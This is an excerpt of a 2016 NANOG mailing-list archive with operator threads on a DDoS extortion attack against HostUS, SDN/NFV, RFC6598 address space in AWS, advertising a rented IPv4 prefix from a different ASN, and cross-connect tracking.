Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >>>> >>>> On 08/03/16 09:41, Robert Webb wrote: >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? >>>>> >>>>> Woke up to no email this morning and the following from their web >> site: >>>>> >>>>> >>>>> >>>>> *Following an extortion attempt, HostUS is currently experiencing >>>> sustained >>>>> large-scale DDOS attacks against a number of locations. The attacks >> were >>>>> measured in one location at 300Gbps. In another location the attacks >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 >>>> provider. >>>>> Please be patient. We will return soon. Your understanding is >>>> appreciated. >>>>> * >>>>> >>>>> >>>>> >From my monitoring system, looks like my VPS went unavailable around >>>> 23:00 >>>>> EDT last night. >>>>> >>>>> Robert >>>>> >>>> >>>> >>> >> -- Phil Gardner PGP Key ID 0xFECC890C OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 From hugo at slabnet.com Thu Aug 4 15:23:42 2016 From: hugo at slabnet.com (Hugo Slabbert) Date: Thu, 4 Aug 2016 08:23:42 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> References: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> Message-ID: <20160804152342.GC1207@bamboo.slabnet.com> On Thu 2016-Aug-04 08:20:58 +0200, Mark Tinka wrote: > >On 3/Aug/16 18:11, jim deleskie wrote: > >> I struggled with this whole SDN/NVF/insert marketing term for a while at >> first, until I sat down and actually though about. When I strip away all >> the foo, what I'm left with is breaking things down to pieces and and >> putting logo blocks together in a way that best suits what I'm doing. It >> is really going back to the way things were a long time ago in the days of >> 12/2400 baud models and 56k frame relay. It doesn't help vendors vendors >> that want to sell you over priced foo for features you don't really need. >> It lets you, if you have clue build your own right bits. It will see some >> vendors evolve, new vendors of their brand of foo appear and some vendors >> die, but end of day, its no different then most of were doing back in the >> "good ol days" > >The way I see it, the whole SDN/NFV talk has finally devolved into >automation (separating the control and data plane is sooooo 2013). > >Automation is not new - a lot of networks have been automating for a >long time now, albeit in custom ways that only worked for them... ummh, >rephrase: was not tested in other networks. > >The reason I see SDN/NFV becoming a thing is just to have a standard way >of automating. That's it. That somewhat mirrors my take on it. At the risk of being flamed to hell, I see SDN/NFV being to network operations as DevOps/CI/CM/containers are to dev and systems. Both are bringing in new tools and such, but ultimately they *require* solid automation and having your house (systems, processes workflow) in order to be able to deploy, with the hype train providing budget allocation and sufficient buy-in to get it to fly. You can do network automation and service provisioning without NFV and centralized SDN controllers, and you can do CM and good tooling without going headlong into DevOps. Obviously SDN/NFV and DevOps have their own pieces that layer on top of that (e.g. control plane / forwarding plane separation and commoditization of the forwarding hardware in the former; development model and "culture" in the latter), and you have to sift through the hype and buzzword bingo to find what if any of that would deliver value in your environment. But, that doesn't mean we can't benefit from the advances and possible standardization in tooling and automation that come along for the ride. > >Mark. -- Hugo Slabbert | email, xmpp/jabber: hugo at slabnet.com pgp key: B178313E | also on Signal -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: Digital signature URL: From rwfireguru at gmail.com Thu Aug 4 16:03:11 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Thu, 4 Aug 2016 12:03:11 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Looks like ATL01 is down again hard. Although, as someone else mentioned earlier, IPv6 seems to be just fine. Robert On Wed, Aug 3, 2016 at 12:40 PM, Phil Gardner wrote: > One of my VPS with them is in Atlanta, and while the IPv4 address is > unresponsive, the IPv6 address is working without issue. > > > On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > where seemingly Alexander's been updating ( > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) > - > > seems like Atlanta and LA are still down ATM based on latest reports - > > nearly 10 hours now. > > > > Tks. > > > > Regards, > > Neo Soon Keat > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > >> Apologies to all as the hostname in my subject is incorrect. > >> > >> It should be hostus.us... > >> > >> > >> > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > wrote: > >> > >>> Not sure if it is related to the PokemonGO or not. This started around > >>> 23:00 EDT last night per my monitoring. > >>> > >>> Seems like a pretty big attack at 300Gbps and to also temporarily take > a > >>> down a Tier 1 POP in a major city. > >>> > >>> I was interested as to if this might be a botnet or some type of > >>> reflection attack. > >>> > >>> > >>> Robert > >>> > >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > >> wrote: > >>> > >>>> Well, > >>>> > >>>> > >>>> Could it be related to the last 2 days DDoS of PokemonGO (which > >>>> failed) and some other gaming sites (Blizzard and Steam)? > >>>> > >>>> > >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >>>> person that defended their position earlier this week, but there may > be > >>>> more hints (unverified) against your statements: > >>>> > >>>> https://twitter.com/xotehpoodle/status/756850023896322048 > >>>> > >>>> That could be explored. > >>>> > >>>> > >>>> On top of which there is hints (unverified) on which is the real > bad > >>>> actor behind that new DDoS service: > >>>> > >>>> > >>>> > >>>> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >>>> > >>>> > >>>> And I quote: > >>>> > >>>> "One thing LeakedSource staff spotted was that the first > payment > >>>> recorded in the botnet's control panel was of $1, while payments for > the > >>>> same package plan were of $19.99." > >>>> > >>>> ( Paypal payments btw ) > >>>> > >>>> > >>>> There is enough information, and damages, imho, to start looking > for > >>>> the people responsible from a legal standpoint. And hopefully the > >>>> proper authorities are interested. > >>>> > >>>> PS: > >>>> > >>>> I will like to take this time to underline the lack of > >>>> participation from a vast majority of ISPs into BCP38 and the like. > We > >>>> need to keep educating them at every occasion we have. > >>>> > >>>> For those that actually implemented some sort of tech against > >>>> it, you are a beacon of hope in what is a ridiculous situation that > has > >>>> been happening for more than 15 years. > >>>> > >>>> ----- > >>>> Alain Hebert ahebert at pubnix.net > >>>> PubNIX Inc. > >>>> 50 boul. St-Charles > >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >>>> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >>>> > >>>> On 08/03/16 09:41, Robert Webb wrote: > >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? > >>>>> > >>>>> Woke up to no email this morning and the following from their web > >> site: > >>>>> > >>>>> > >>>>> > >>>>> *Following an extortion attempt, HostUS is currently experiencing > >>>> sustained > >>>>> large-scale DDOS attacks against a number of locations. The attacks > >> were > >>>>> measured in one location at 300Gbps. In another location the attacks > >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 > >>>> provider. > >>>>> Please be patient. We will return soon. Your understanding is > >>>> appreciated. > >>>>> * > >>>>> > >>>>> > >>>>> >From my monitoring system, looks like my VPS went unavailable around > >>>> 23:00 > >>>>> EDT last night. > >>>>> > >>>>> Robert > >>>>> > >>>> > >>>> > >>> > >> > > -- > Phil Gardner > PGP Key ID 0xFECC890C > OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 > From morrowc.lists at gmail.com Thu Aug 4 17:35:29 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Thu, 4 Aug 2016 13:35:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: "it's good that there aren't any easy solutions to this sort of problem..." On Thu, Aug 4, 2016 at 12:03 PM, Robert Webb wrote: > Looks like ATL01 is down again hard. > > Although, as someone else mentioned earlier, IPv6 seems to be just fine. > > Robert > > On Wed, Aug 3, 2016 at 12:40 PM, Phil Gardner > wrote: > > > One of my VPS with them is in Atlanta, and while the IPv4 address is > > unresponsive, the IPv6 address is working without issue. > > > > > > On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > > where seemingly Alexander's been updating ( > > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998 > ) > > - > > > seems like Atlanta and LA are still down ATM based on latest reports - > > > nearly 10 hours now. > > > > > > Tks. > > > > > > Regards, > > > Neo Soon Keat > > > > > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > > > >> Apologies to all as the hostname in my subject is incorrect. > > >> > > >> It should be hostus.us... > > >> > > >> > > >> > > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > > wrote: > > >> > > >>> Not sure if it is related to the PokemonGO or not. This started > around > > >>> 23:00 EDT last night per my monitoring. > > >>> > > >>> Seems like a pretty big attack at 300Gbps and to also temporarily > take > > a > > >>> down a Tier 1 POP in a major city. > > >>> > > >>> I was interested as to if this might be a botnet or some type of > > >>> reflection attack. > > >>> > > >>> > > >>> Robert > > >>> > > >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > > >> wrote: > > >>> > > >>>> Well, > > >>>> > > >>>> > > >>>> Could it be related to the last 2 days DDoS of PokemonGO (which > > >>>> failed) and some other gaming sites (Blizzard and Steam)? > > >>>> > > >>>> > > >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare > > >>>> person that defended their position earlier this week, but there may > > be > > >>>> more hints (unverified) against your statements: > > >>>> > > >>>> https://twitter.com/xotehpoodle/status/756850023896322048 > > >>>> > > >>>> That could be explored. > > >>>> > > >>>> > > >>>> On top of which there is hints (unverified) on which is the real > > bad > > >>>> actor behind that new DDoS service: > > >>>> > > >>>> > > >>>> > > >>>> > > >> > > http://news.softpedia.com/news/pokemon-go-ddos-attacks- > postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > >>>> > > >>>> > > >>>> And I quote: > > >>>> > > >>>> "One thing LeakedSource staff spotted was that the first > > payment > > >>>> recorded in the botnet's control panel was of $1, while payments for > > the > > >>>> same package plan were of $19.99." > > >>>> > > >>>> ( Paypal payments btw ) > > >>>> > > >>>> > > >>>> There is enough information, and damages, imho, to start looking > > for > > >>>> the people responsible from a legal standpoint. And hopefully the > > >>>> proper authorities are interested. > > >>>> > > >>>> PS: > > >>>> > > >>>> I will like to take this time to underline the lack of > > >>>> participation from a vast majority of ISPs into BCP38 and the like. > > We > > >>>> need to keep educating them at every occasion we have. > > >>>> > > >>>> For those that actually implemented some sort of tech > against > > >>>> it, you are a beacon of hope in what is a ridiculous situation that > > has > > >>>> been happening for more than 15 years. > > >>>> > > >>>> ----- > > >>>> Alain Hebert ahebert at pubnix.net > > >>>> PubNIX Inc. > > >>>> 50 boul. St-Charles > > >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > > >>>> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > >>>> > > >>>> On 08/03/16 09:41, Robert Webb wrote: > > >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? > > >>>>> > > >>>>> Woke up to no email this morning and the following from their web > > >> site: > > >>>>> > > >>>>> > > >>>>> > > >>>>> *Following an extortion attempt, HostUS is currently experiencing > > >>>> sustained > > >>>>> large-scale DDOS attacks against a number of locations. The attacks > > >> were > > >>>>> measured in one location at 300Gbps. In another location the > attacks > > >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 > > >>>> provider. > > >>>>> Please be patient. We will return soon. Your understanding is > > >>>> appreciated. > > >>>>> * > > >>>>> > > >>>>> > > >>>>> >From my monitoring system, looks like my VPS went unavailable > around > > >>>> 23:00 > > >>>>> EDT last night. > > >>>>> > > >>>>> Robert > > >>>>> > > >>>> > > >>>> > > >>> > > >> > > > > -- > > Phil Gardner > > PGP Key ID 0xFECC890C > > OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 > > > From arlingtonalbertson at gmail.com Thu Aug 4 22:52:53 2016 From: arlingtonalbertson at gmail.com (Arlington Albertson) Date: Thu, 04 Aug 2016 22:52:53 +0000 Subject: RFC6598 in AWS? Message-ID: Hey folks, We've filed a support ticket to find out the supported level for this range, but I wanted to see if there was anyone out there who'd experienced using the 100.64.0.0/10 space in AWS? Thanks, -AA From andrew at vianet.ca Thu Aug 4 19:39:55 2016 From: andrew at vianet.ca (Andrew) Date: Thu, 04 Aug 2016 15:39:55 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. Message-ID: Hello List, I work for a medium sized ISP. We are entering an agreement to rent some IPv4 space from a local higher education institution. Being a multi-homed ISP we would like to advertise the rented prefix from our ASN. The prefix that will be advertised is a smaller subnet from the higher educations block; they will continue to advertise the larger prefix. What is the best way to accomplish this? Is there any way of doing this without having to tunnel the traffic through the origin ASN? I feel if we just adverse the prefix it get put on a bogon list for prefix hijacking. This space is rented long term but they are not interested in reassigning the space to us. They also want to keep advertising their prefix as one contiguous block. I appreciate any insight and information. Thank you for your time, Andrew. From neo at soonke.at Fri Aug 5 13:40:24 2016 From: neo at soonke.at (Soon Keat Neo) Date: Fri, 5 Aug 2016 21:40:24 +0800 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: If you are just announcing more specific address space that you've obtained legitimately off their assigned address space, it should be no problem, just obtain an LoA and register it on the different databases and you should be set to ask your upstreams to allow the announcements. Regards, Neo Soon Keat 2016-08-05 3:39 GMT+08:00 Andrew : > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent some > IPv4 space from a local higher education institution. Being a multi-homed > ISP we would like to advertise the rented prefix from our ASN. The prefix > that will be advertised is a smaller subnet from the higher educations > block; they will continue to advertise the larger prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just adverse the prefix it get put on a bogon list for prefix > hijacking. This space is rented long term but they are not interested in > reassigning the space to us. They also want to keep advertising their > prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From nanog at stefan-neufeind.de Fri Aug 5 13:41:59 2016 From: nanog at stefan-neufeind.de (Stefan Neufeind) Date: Fri, 5 Aug 2016 15:41:59 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <6ec2b899-59ce-c932-9b1a-fbe835c8bd8a@stefan-neufeind.de> On 04.08.2016 21:39, Andrew wrote: > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher educations block; they will continue to advertise the larger prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just adverse the prefix it get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. Make sure proper route-objects exist. Should be no big deal then imho. Others do it as well - also advertising the larger block from one ASN and a smaller portion of it from another. Kind regards, Stefan From JJaritsch at anexia-it.com Fri Aug 5 13:41:41 2016 From: JJaritsch at anexia-it.com (=?iso-8859-1?Q?J=FCrgen_Jaritsch?=) Date: Fri, 5 Aug 2016 13:41:41 +0000 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <585720d0f1ac4d6c94ca4c6805478acb@anx-i-dag02.anx.local> Just create a more specific route obejct (for the /nn you plan to announce) at your RIR, ask the institute to sign a LOA and inform your upstreams. Announcing the more specific is nothing unusual. J?rgen Jaritsch Head of Network & Infrastructure ANEXIA Internetdienstleistungs GmbH Telefon: +43-5-0556-300 Telefax: +43-5-0556-500 E-Mail: jjaritsch at anexia-it.com Web: http://www.anexia.at Anschrift Hauptsitz Klagenfurt: Feldkirchnerstra?e 140, 9020 Klagenfurt Gesch?ftsf?hrer: Alexander Windbichler Firmenbuch: FN 289918a | Gerichtsstand: Klagenfurt | UID-Nummer: AT U63216601 -----Original Message----- From: Andrew [andrew at vianet.ca] Received: Freitag, 05 Aug. 2016, 15:33 To: nanog at nanog.org [nanog at nanog.org] Subject: Advertising rented IPv4 prefix from a different ASN. Hello List, I work for a medium sized ISP. We are entering an agreement to rent some IPv4 space from a local higher education institution. Being a multi-homed ISP we would like to advertise the rented prefix from our ASN. The prefix that will be advertised is a smaller subnet from the higher educations block; they will continue to advertise the larger prefix. What is the best way to accomplish this? Is there any way of doing this without having to tunnel the traffic through the origin ASN? I feel if we just adverse the prefix it get put on a bogon list for prefix hijacking. This space is rented long term but they are not interested in reassigning the space to us. They also want to keep advertising their prefix as one contiguous block. I appreciate any insight and information. Thank you for your time, Andrew. From mark.tinka at seacom.mu Fri Aug 5 13:52:25 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Fri, 5 Aug 2016 15:52:25 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> On 5/Aug/16 15:40, Soon Keat Neo wrote: > If you are just announcing more specific address space that you've obtained > legitimately off their assigned address space, it should be no problem, > just obtain an LoA and register it on the different databases and you > should be set to ask your upstreams to allow the announcements. Do people actually do this? A customer asked us to do this for them and we refused, because inconsistent AS has never been a thing. I'm apprehensive about a subnet and its aggregate appearing from multiple AS's at the same time. But, I'm old school, so... Mark. From bob at FiberInternetCenter.com Fri Aug 5 13:57:16 2016 From: bob at FiberInternetCenter.com (Bob Evans) Date: Fri, 5 Aug 2016 06:57:16 -0700 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <89b9a63cac7126e6515aac975bb1a801.squirrel@66.201.44.180> Hi Andrew, It is possible, but I would do it....Here is how and why. If they announce the larger CDIR you will need to keep them as one of you ISP's or you risk losing traffic due to other's inbound policy filtering. However, if they provide you a simple Letter of Authorization to announce the smaller rented CDIR you can use this letter to show other networks that you have the right to announce it and they can email/call to confirm. By announcing the smaller CDIR to others you should see the bulk of the traffic come in via the other backbones. You can "not reliably" multi-home the IPs without keeping the institution as one of your backbone providers (reason I wouldn't do it). You will always need a peering session with them where you announce to them your CDIR or they static route that traffic to you. Thank You Bob Evans CTO > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher educations block; they will continue to advertise the larger > prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just adverse the prefix it get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From blake at ispn.net Fri Aug 5 14:01:40 2016 From: blake at ispn.net (Blake Hudson) Date: Fri, 5 Aug 2016 09:01:40 -0500 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: Andrew wrote on 8/4/2016 2:39 PM: > This space is rented long term but they are not interested in > reassigning the space to us. Isn't this a violation of their agreement with ARIN (https://www.arin.net/resources/request/reassignments.html)? From bob at FiberInternetCenter.com Fri Aug 5 14:06:16 2016 From: bob at FiberInternetCenter.com (Bob Evans) Date: Fri, 5 Aug 2016 07:06:16 -0700 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <21d31b0a1d55335d88e784cf0b3b0b1c.squirrel@66.201.44.180> It's possible that it is a university that has legacy IPs. You have to check. Thank You Bob Evans CTO > Andrew wrote on 8/4/2016 2:39 PM: >> This space is rented long term but they are not interested in >> reassigning the space to us. > > Isn't this a violation of their agreement with ARIN > (https://www.arin.net/resources/request/reassignments.html)? > > > > > From davidbass570 at gmail.com Fri Aug 5 14:10:41 2016 From: davidbass570 at gmail.com (David Bass) Date: Fri, 5 Aug 2016 10:10:41 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: > On Aug 5, 2016, at 9:52 AM, Mark Tinka wrote: > > > >> On 5/Aug/16 15:40, Soon Keat Neo wrote: >> >> If you are just announcing more specific address space that you've obtained >> legitimately off their assigned address space, it should be no problem, >> just obtain an LoA and register it on the different databases and you >> should be set to ask your upstreams to allow the announcements. > > Do people actually do this? A customer asked us to do this for them and > we refused, because inconsistent AS has never been a thing. > > I'm apprehensive about a subnet and its aggregate appearing from > multiple AS's at the same time. But, I'm old school, so... > > Mark. I agree with you...not a great practice. Each AS should just announce the prefix that they actually use. The school could be used as a transit for the ISP, which may be undesirable. From chris.welti at switch.ch Fri Aug 5 14:27:34 2016 From: chris.welti at switch.ch (Chris Welti) Date: Fri, 5 Aug 2016 16:27:34 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: I would not recommend to do that. If you really do this, please make sure that the owner of the supernet (in this case the university) also does transit for the subnet (which they should as they are supposed to accept and forward traffic for the whole aggregate that they are announcing). Otherwise, for networks that only do partial routing (basically defaults from transits + peering routes), this will create a blackhole in case they peer with the ISP that announces only the supernet, but not with the ISP that announces the subnet, because traffic will always be routed towards the announcement of the supernet only. Same applies if the subnet gets filtered by some people for policy reasons (like no more-specifics of PA space, or smaller than /24...). Also, be careful that the owner of the supernet doesn't apply inbound anti-spoofing filters at their borders towards transits and peers for traffic from your subnet that is part of their supernet. Chris On 04/08/16 21:39, Andrew wrote: > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher educations block; they will continue to advertise the larger > prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just adverse the prefix it get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From tore at fud.no Fri Aug 5 14:38:37 2016 From: tore at fud.no (Tore Anderson) Date: Fri, 5 Aug 2016 16:38:37 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: <20160805163837.7d22deb7@envy.e1.y.home> * Mark Tinka > On 5/Aug/16 15:40, Soon Keat Neo wrote: > > > If you are just announcing more specific address space that you've > > obtained legitimately off their assigned address space, it should > > be no problem, just obtain an LoA and register it on the different > > databases and you should be set to ask your upstreams to allow the > > announcements. > > Do people actually do this? Just as an example: There are hundreds of more-specifics coming out of 8/8 that has a different origin AS than 8/8 itself, so yes, people do. Tore From neo at soonke.at Fri Aug 5 15:28:49 2016 From: neo at soonke.at (Soon Keat Neo) Date: Fri, 5 Aug 2016 23:28:49 +0800 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <20160805163837.7d22deb7@envy.e1.y.home> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> <20160805163837.7d22deb7@envy.e1.y.home> Message-ID: I'm not sure how bad of a practice it really is, however, I've seen it in use in multiple networks and ASes who sublet their IP space, and far as I've known, seem to work fine for most networks. Of course, this may also cause the University itself to be subject to unwanted traffic if for example the BGP session announcing the subletted space goes down. And, whether this violates the RIR regulations is another thing altogether. SoonKeat Regards, Neo Soon Keat 2016-08-05 22:38 GMT+08:00 Tore Anderson : > * Mark Tinka > > > On 5/Aug/16 15:40, Soon Keat Neo wrote: > > > > > If you are just announcing more specific address space that you've > > > obtained legitimately off their assigned address space, it should > > > be no problem, just obtain an LoA and register it on the different > > > databases and you should be set to ask your upstreams to allow the > > > announcements. > > > > Do people actually do this? > > Just as an example: There are hundreds of more-specifics coming out of > 8/8 that has a different origin AS than 8/8 itself, so yes, people do. > > Tore > From bill at herrin.us Fri Aug 5 15:47:49 2016 From: bill at herrin.us (William Herrin) Date: Fri, 5 Aug 2016 11:47:49 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: On Fri, Aug 5, 2016 at 10:01 AM, Blake Hudson wrote: > Andrew wrote on 8/4/2016 2:39 PM: >> This space is rented long term but they are not interested in reassigning >> the space to us. > > > Isn't this a violation of their agreement with ARIN > (https://www.arin.net/resources/request/reassignments.html)? If the space in question is post-1997 then yes, either renting space as an "end user" or failing to swip reassigned space as an ISP violates their agreement with ARIN. It could be reported as fraud making everybody unhappy. If the edu's space is a legacy assignment then they have no agreement with ARIN to violate. On a more practical level, you'll encounter three kinds of trouble: 1. Despite your best efforts, the school will receive some packets intended for you. Make sure you have a tunnel in place to catch them. 2. Reverse path filtering may trip you up if the school hasn't already addressed that with their ISPs. 3. Their own internal firewalls and access control mechanisms which have, over the years, been programmed to act on their entire address space. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From theodore at ciscodude.net Fri Aug 5 16:04:22 2016 From: theodore at ciscodude.net (Theodore Baschak) Date: Fri, 5 Aug 2016 11:04:22 -0500 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: <95F83982-B222-40E9-B1B8-BDDDA5C95A07@ciscodude.net> > On Aug 5, 2016, at 8:52 AM, Mark Tinka wrote: > > > On 5/Aug/16 15:40, Soon Keat Neo wrote: > >> If you are just announcing more specific address space that you've obtained >> legitimately off their assigned address space, it should be no problem, >> just obtain an LoA and register it on the different databases and you >> should be set to ask your upstreams to allow the announcements. > > Do people actually do this? A customer asked us to do this for them and > we refused, because inconsistent AS has never been a thing. > > I'm apprehensive about a subnet and its aggregate appearing from > multiple AS's at the same time. But, I'm old school, so... > > Mark. Yes, this is quite prevalent. For example a popular resolver within prefix 8.8.8.0/24 (and also 8.8.4.0/24) has 8.0.0.0/9 advertised by 3356. Theodore Baschak - AS395089 - Hextet Systems https://ciscodude.net/ - https://hextet.systems/ https://theodorebaschak.com/ - http://mbix.ca/ From bill at herrin.us Fri Aug 5 16:04:04 2016 From: bill at herrin.us (William Herrin) Date: Fri, 5 Aug 2016 12:04:04 -0400 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: On Thu, Aug 4, 2016 at 6:52 PM, Arlington Albertson wrote: > We've filed a support ticket to find out the supported level for this > range, but I wanted to see if there was anyone out there who'd experienced > using the 100.64.0.0/10 space in AWS? Hi, The Carrier NAT space? The only difference between that and RFC1918 space is that when you have an address conflict with a third party using 100.64.0.0/10 it is 100% entirely your fault for misappropriating it. Generally speaking, 100.64.0.0/10 should not be assigned to servers, only client machines. Assigning it to servers creates a probability of conflict that the space was meant to solve. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From hannigan at gmail.com Fri Aug 5 16:59:09 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Fri, 5 Aug 2016 12:59:09 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: On Thu, Aug 4, 2016 at 3:39 PM, Andrew wrote: > Hello List, > [ clip, plenty of advice on these points ] > I feel if we just adverse the prefix it get put on a bogon list for prefix > hijacking. This space is rented long term but they are not interested in > reassigning the space to us. They also want to keep advertising their > prefix as one contiguous block. You will also likely need a letter of authorization from the network lending you their space for your upstreams or others. Here's a usable template that you can customize for your own purposes. Hope this helps: http://bit.ly/LOA-0805201601 Caveats, IPv6? Be sure to consult with lawyers, comply with your favorite RIR policy and compare the cost of "renting" to "leasing" or acquiring on the open market. There are a number of sources to acquire IPv4 address space easily found using your favorite search engine. You may be also be eligible for a last /22 allocation from RIPE if you qualify under their current policy. See http://bit.ly/LASTCALL-22 for further information. Best Regards, -M< From eric.kuhnke at gmail.com Mon Aug 8 17:14:57 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Mon, 8 Aug 2016 10:14:57 -0700 Subject: Best practices for tracking intra-facility crossconnects Message-ID: Hey all, I am looking to see what the community's experience has been with different types of labeling systems and XC tracking systems for intra-facility crossconnects. In addition to the standard practice of labeling every fiber at both ends, if you're using a system that wraps a cable marker around the cable every 3 ft/1 meter, what type of system are you using to track XCs? If you have implemented a standards-based system with some type of GUID for every cable, and a unique per-cable tracking system that is utilized with a ticketing system for each distinct cable (whether -48VDC, fiber, cat5e, alarm wire, whatever), what did you have to customize for your needs? If you have implemented such a system in an older facility where every cable did not previously have a unique ID#, what hiccups did you run into? If you were designing such a system from a 'green field' approach for a brand new datacenter/colo/IX facility that is yet to be constructed, what would you do differently (both at OSI layer 1, and in the operational support software tracking the XCs?) From leefuller23 at gmail.com Sat Aug 6 06:43:18 2016 From: leefuller23 at gmail.com (Lee Fuller) Date: Sat, 6 Aug 2016 07:43:18 +0100 Subject: Google compute engine private ASNs In-Reply-To: References: Message-ID: Hey, first post so sorry if it's misguided. I'm curious about the BGP implementation in Google compute engine that allows you to define routing policy using private ASN numbers. How similar is it in terms of learning about BGP as a broader concept, or is it all smoke and mirrors? I'm not in a position where iBGP would benefit me in any other context than learning so I'm keen not to bother if it's too abstracted from a real world scenario. Lee Fuller (mobile) PGP Fingerprint: 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A From matthieu at nxdomain.fr Sun Aug 7 09:37:41 2016 From: matthieu at nxdomain.fr (Matthieu Michaud) Date: Sun, 7 Aug 2016 11:37:41 +0200 Subject: RFC6598 in AWS? In-Reply-To: References: Message-ID: Hi, I fully agree with William and it's used in AWS infrastructure (VPC Internet GW IIRW). Best regards, On Fri, Aug 5, 2016 